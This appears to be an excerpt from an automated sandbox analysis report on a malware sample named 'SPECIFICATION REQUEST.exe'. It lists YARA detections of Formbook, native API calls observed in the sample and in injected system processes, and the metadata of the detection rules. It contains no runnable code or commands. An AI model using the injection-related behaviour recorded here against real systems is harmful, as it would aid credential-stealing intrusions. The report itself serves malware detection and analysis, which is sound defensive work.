            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00419D60 NtCreateFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00419E10 NtReadFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00419E90 NtClose,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00419D5A NtCreateFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00419E0B NtReadFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011499A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011498F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011495D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011497A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011496E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011499D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0114B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011498A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0114A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149A10 NtQuerySection,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0114AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149560 NtWriteFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011495F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0114A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0114A770 NtOpenThread,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149760 NtOpenProcess,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149FE0 NtCreateMutant,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01149670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011496D0 NtCreateKey,
            Source: C:\Windows\explorer.exeCode function: 3_2_06D25A32 NtCreateFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033099A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033096E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033096D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033095D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0330A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033099D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0330B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033098A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033098F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0330A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0330A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033097A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0330AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03309560 NtWriteFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033095F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C9D60 NtCreateFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C9E10 NtReadFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C9E90 NtClose,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C9F40 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C9D5A NtCreateFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C9E0B NtReadFile,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_00F0B264
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_00F0C2B0
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_00F09990
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_00F0DF71
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_04E8E660
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_04E8E0A8
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_04E8E388
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_04E8E098
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_04E8E37A
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_04E8CCC8
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_04E8CCB8
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00401030
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041D2B1
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041DD4C
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00402D87
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00402D90
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00409E40
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00409E3C
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041E685
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041DFA3
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00402FB0
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041D7B8
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110F900
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01124120
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1002
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011DE824
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111B090
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011320A0
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D20A8
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D28EC
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D2B28
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113EBB0
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C03DA
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CDBD2
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D22AE
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D2D07
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01100D20
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D1D55
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132581
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D25DD
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111D5E0
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111841F
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CD466
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011DDFCE
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D1FF1
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CD616
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01126E30
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D2EF7
            Source: C:\Windows\explorer.exeCode function: 3_2_06D25A32
            Source: C:\Windows\explorer.exeCode function: 3_2_06D1DCF2
            Source: C:\Windows\explorer.exeCode function: 3_2_06D1DCEC
            Source: C:\Windows\explorer.exeCode function: 3_2_06D1C072
            Source: C:\Windows\explorer.exeCode function: 3_2_06D24862
            Source: C:\Windows\explorer.exeCode function: 3_2_06D1C069
            Source: C:\Windows\explorer.exeCode function: 3_2_06D28A6F
            Source: C:\Windows\explorer.exeCode function: 3_2_06D20B1F
            Source: C:\Windows\explorer.exeCode function: 3_2_06D28B0E
            Source: C:\Windows\explorer.exeCode function: 3_2_06D23132
            Source: C:\Windows\explorer.exeCode function: 3_2_06D20B22
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03392B28
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EAB40
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FEBB0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033723E3
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033803DA
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338DBD2
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FABD8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0337FA2B
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033922AE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E4120
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CF900
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0339E824
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA830
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03381002
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F20A0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033920A8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DB090
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033928EC
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03391FF1
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0339DFCE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E6E30
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338D616
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03392EF7
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C0D20
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03392D07
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03391D55
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F2581
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DD5E0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033925DD
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032D841F
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338D466
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005B2D90
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005B2D87
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005B9E40
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005B9E3C
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005B2FB0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005CDFA3
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032CB150 appears 107 times
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: String function: 0110B150 appears 45 times
            Source: SPECIFICATION REQUEST.exe, 00000000.00000000.228552775.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnmanagedFunctionPointerAttribute.exeT vs SPECIFICATION REQUEST.exe
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs SPECIFICATION REQUEST.exe
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.238523858.0000000005DE0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs SPECIFICATION REQUEST.exe
            Source: SPECIFICATION REQUEST.exe, 00000002.00000002.275767247.0000000000768000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnmanagedFunctionPointerAttribute.exeT vs SPECIFICATION REQUEST.exe
            Source: SPECIFICATION REQUEST.exe, 00000002.00000002.276221751.00000000010A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs SPECIFICATION REQUEST.exe
            Source: SPECIFICATION REQUEST.exe, 00000002.00000002.276435498.00000000011FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SPECIFICATION REQUEST.exe
            Source: SPECIFICATION REQUEST.exeBinary or memory string: OriginalFilenameUnmanagedFunctionPointerAttribute.exeT vs SPECIFICATION REQUEST.exe
            Source: SPECIFICATION REQUEST.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
